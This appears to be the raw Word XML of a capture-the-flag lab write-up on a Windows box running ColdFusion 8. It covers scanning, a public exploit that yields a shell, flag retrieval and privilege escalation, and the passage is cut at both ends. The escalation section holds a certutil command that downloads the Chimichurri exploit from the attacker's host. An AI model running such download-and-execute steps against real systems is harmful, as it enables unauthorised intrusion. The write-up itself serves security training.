        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8742A6" w14:textId="34D4FA88" w:rsidR="00CB3015" w:rsidRDefault="00100B03" w:rsidP="00100B03">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc169461191"/>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC5FFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scan results</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="48BA3A34" w14:textId="3D8698DB" w:rsidR="00D265A3" w:rsidRDefault="00100B03" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Open ports are 135, 8500 and 49154. So, this box has an RPC service enabled on ports 135 and 49154 and another service on port 8500. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not sure about which service is running on port 8500 and it guesses it is FMTP. Also, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> guesses that OS is Windows, but I haven’t any more specific details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCA4B44" w14:textId="287FE76D" w:rsidR="00D265A3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc169461180"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Initial foothold</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="592554D6" w14:textId="2D4E2575" w:rsidR="00D265A3" w:rsidRDefault="00100B03" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> didn’t recognize for sure the service running on port 8500, I looked for it on Internet. So, I found that on that port can be run a </w:t>
      </w:r>
      <w:r w:rsidRPr="00100B03">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Macromedia ColdFusion MX Server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. This kind of server allow the remote access on this port as web server. As confirmation, I tried to navigate to </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C92401">
          <w:rPr>
            <w:rStyle w:val="Collegamentoipertestuale"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://10.10.10.11:8500/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I was able to navigate the server filesystem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3140DE1B" w14:textId="77777777" w:rsidR="00100B03" w:rsidRDefault="00100B03" w:rsidP="00100B03">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ADA177C" wp14:editId="15AD249D">
            <wp:extent cx="6120130" cy="1917700"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="13278483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48311" name="Immagine 1327848311"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="1917700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D53CC2" w14:textId="1666D55F" w:rsidR="00100B03" w:rsidRDefault="00100B03" w:rsidP="00100B03">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc169461192"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC5FFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Macromedia ColdFusion MX Server remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>acceess</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="25AEDA9B" w14:textId="25FE0BCD" w:rsidR="00100B03" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Browsing the documentation, I was able to identify the ColdFusion version, as shown in the following figure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D71E1" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B641CC6" wp14:editId="425128A2">
            <wp:extent cx="6120130" cy="3591560"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="16970375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37560" name="Immagine 1697037560"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3591560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0016E" w14:textId="3827E1DD" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc169461193"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC5FFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - ColdFusion version</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="32AC37E7" w14:textId="108CC7B6" w:rsidR="00D265A3" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc169461181"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>User flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="4FFDD6C6" w14:textId="0D1EA3D9" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">At this point, I looked for an exploit on Internet regarding the ColdFusion 8 server. I found one on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploitDB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, set it up and run. In this way, I obtained a shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F602E9" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6888106F" wp14:editId="4FA59AE3">
            <wp:extent cx="6120130" cy="3195955"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="61158287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2876" name="Immagine 6115828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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3798F9" w14:textId="297553D9" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc169461194"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC5FFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Exploit ColdFusion 8</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="2C34E53E" w14:textId="6B5E5506" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In this case I didn’t need to set up a listener because the exploit code did it for me. So, it was the time to retrieve the user flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189414C7" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12A657D7" wp14:editId="12EBAD2F">
            <wp:extent cx="4335627" cy="2639492"/>
            <wp:effectExtent l="0" t="0" r="8255" b="8890"/>
            <wp:docPr id="188057363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73632" name="Immagine 1880573632"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4335627" cy="2639492"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B7C6B9" w14:textId="06D65B55" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc169461195"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC5FFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - User flag</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="2891A773" w14:textId="2E9A9447" w:rsidR="00D265A3" w:rsidRPr="00CB3015" w:rsidRDefault="00D265A3" w:rsidP="00D265A3">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc169461182"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege escalation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="112737BA" w14:textId="7E86EDE8" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To perform the privilege escalation, I found a possibly vulnerability regarding the user privileges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5EDB9D" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E63AB72" wp14:editId="4B3B0A22">
            <wp:extent cx="6120130" cy="3670300"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="7375516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51603" name="Immagine 737551603"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="3670300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3892B1" w14:textId="744E8D60" w:rsidR="004B23E9" w:rsidRPr="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc169461196"/>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC5FFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B23E9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Vulnerability to escalate privileges</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="29295B9C" w14:textId="74A07D83" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>To exploit this vulnerability, I uploaded on the target machine Chimichurri running the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D04E8BE" w14:textId="58EB6F0C" w:rsidR="004B23E9" w:rsidRPr="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00D265A3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <m:oMathPara>
        <m:oMath>
          <m:r>
            <w:rPr>
              <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <m:t>certutil -urlcache -f http://10.10.14.20:9989/Chimichurri.exe Chimichurri.exe</m:t>
          </m:r>
        </m:oMath>
      </m:oMathPara>
    </w:p>
    <w:p w14:paraId="5D802752" w14:textId="72056377" w:rsidR="00D265A3" w:rsidRDefault="004B23E9" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>At this point, I run it as shown in the following figure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C113F57" w14:textId="77777777" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E541D6" wp14:editId="3BCD5794">
            <wp:extent cx="6221095" cy="294983"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9424647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64711" name="Immagine 942464711"/>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6618549" cy="313829"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="66630E84" w14:textId="152738BC" w:rsidR="004B23E9" w:rsidRDefault="004B23E9" w:rsidP="004B23E9">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc169461197"/>
      <w:r w:rsidRPr="004B6CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004B6CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC5FFC">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004B6CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004B6CE4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privesc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4900400F" w14:textId="411D17A3" w:rsidR="004B23E9" w:rsidRDefault="004B6CE4" w:rsidP="00060C0E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Finally, I was able to retrieve the root/administrator flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6941C769" w14:textId="77777777" w:rsidR="004B6CE4" w:rsidRDefault="004B6CE4" w:rsidP="004B6CE4">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17B8B4C6" wp14:editId="732D43CA">
            <wp:extent cx="4230810" cy="2925357"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="70364513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45131" name="Immagine 703645131"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4230810" cy="2925357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45430A3F" w14:textId="60578710" w:rsidR="004B6CE4" w:rsidRPr="00CB3015" w:rsidRDefault="004B6CE4" w:rsidP="004B6CE4">
      <w:pPr>
        <w:pStyle w:val="Didascalia"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc169461198"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00FC5FFC">
        <w:rPr>
